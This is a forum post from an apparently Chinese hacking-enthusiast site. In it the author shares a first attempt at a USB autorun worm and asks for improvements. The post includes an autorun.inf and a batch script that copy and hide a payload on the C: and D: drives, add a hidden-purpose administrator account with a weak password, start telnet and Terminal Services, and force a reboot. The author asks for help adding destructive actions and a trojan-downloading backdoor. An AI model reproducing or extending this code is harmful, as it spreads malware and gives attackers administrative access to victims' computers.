注册
登录
论坛
搜索
插件
默认风格
默认风格_6hOY
D Dark
greenwall
jeans
fashion
私人消息 (0)
公共消息 (0)
论坛任务 (0)
系统消息 (0)
好友消息 (0)
帖子消息 (0)
【3.A.S.T】网络安全爱好者
»
初入江湖
» 首次利用bat写东东 欢迎大家指导
返回列表
发帖
3ast
发短消息
加为好友
3ast
当前离线
3AST官方管理号
UID
33
帖子
394
精华
0
积分
845
威望
1072
金钱
1070
阅读权限
150
在线时间
56 小时
注册时间
2008-7-8
最后登录
2011-3-6
超级版主
帖子
394
积分
845
威望
1072
金钱
1070
在线时间
56 小时
1
楼
跳转到
»
正序看帖
打印
字体大小:
t
T
发表于 2008-8-19 22:25
|
只看该作者
首次利用bat写东东 欢迎大家指导
bat
,
东东
,
指导
,
欢迎
首次利用bat写东东 欢迎大家指导
最近autorun.inf文件似乎很火似的
“引诱“了好多的U盘”下水“哦
查了下原理
自己也想尝试一下
于是先建个autorun.inf写了:
[autorun]
open=sliverG.exe
shell\n=^goodluck^
关于sliverG.exe
我打算先采用bat写成后 再转换成exe然后再加个壳之类的
防止逆向工程 毕竟有”版权“的嘛 嘿嘿[q39]
sliverG.bat文件如下:
@echo off
@copy autorun.inf c:\autorun.inf
@copy autorun.inf d:\autorun.inf
@copy gl.exe c:\sliverG.exe
@copy gl.exe d:\sliverG.exe
@attrib +r +h c:\autorun.inf
@attrib +r +h d:\autorun.inf
@attrib +r +h c:\sliverG.exe
@attrib +r +h d:\sliverG.exe
◎net user sliverG 123 /add
@net localgroup administrators sliverG /add
@net start telnet / Terminal Services 等等
rem 此外还可以写个革盘删除类的命令 不过革盘太混蛋 所以偶不采用
@shutdown -r
================
大家也看到了
这个只是个雏形 根本没什么威力
我们还可以在利用那个传说中的文件夹命名漏洞 把sliverG.exe隐藏进去
然后再在sliverG.exe中加个自启动命令
这样sliverG.exe安全问题就基本解决了
关于net start Terminal Services 这句
说实话 我自己也范嘀咕 这对个人pc似乎没用(xp不支持多人登陆)
net start telnet 这个又要躲过那个什么验证的(榕个有个专门的软件)
所以个人感觉 也没多大的用
还有就是这个传染性不够智能化(根本就是弱智嘛:o ) 有待改进
下面就是破坏性 希望大家给点意见
最后是后门的问题了 最好能自动下载种个木马 这个呢也要大家帮帮忙
(干脆别写了 什么都不会[w10] )
大家有好的建议还可以提出
共同学习嘛 :lol
希望大家多多捧场
踊跃发言
嘎嘎[q37]
有兴趣的还可以加我QQ:463961475
收藏
分享
Aim、Ambition、Action Security Team
Just For the
Security . . . . . . .
The way to hacking. . .
■■■■■98%
返回列表
【 新 手 入 门 】
初入江湖
有问必答
软件交流
程序设计
黑客播报
操作系统
Windows专区
Unix 专区
【 技 术 交 流 】
原创专区
QQ技巧
反黑知识
网站建设
教程发布
技术交流
免杀技术
0day发布
专题归类
私服技术
【 论 坛 水 区 】
被黑站点
激情灌水
极品贴图
开心乐园
影音专区
广告专区
【 论 坛 管 理 】
新人报到
论坛管理
勋章申请
[收藏此主题]
[关注此主题的新回复]
[通过 QQ、MSN 分享给朋友]
全国地图
@@@ 加入本站会员 一个月月赚1200+的秘密@@@